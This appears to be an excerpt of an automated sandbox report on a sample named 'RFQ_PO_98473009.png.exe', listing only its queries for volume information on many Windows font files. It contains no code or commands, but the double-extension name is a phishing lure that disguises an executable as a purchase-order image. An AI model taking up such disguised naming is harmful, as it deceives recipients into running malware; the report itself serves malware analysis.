                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
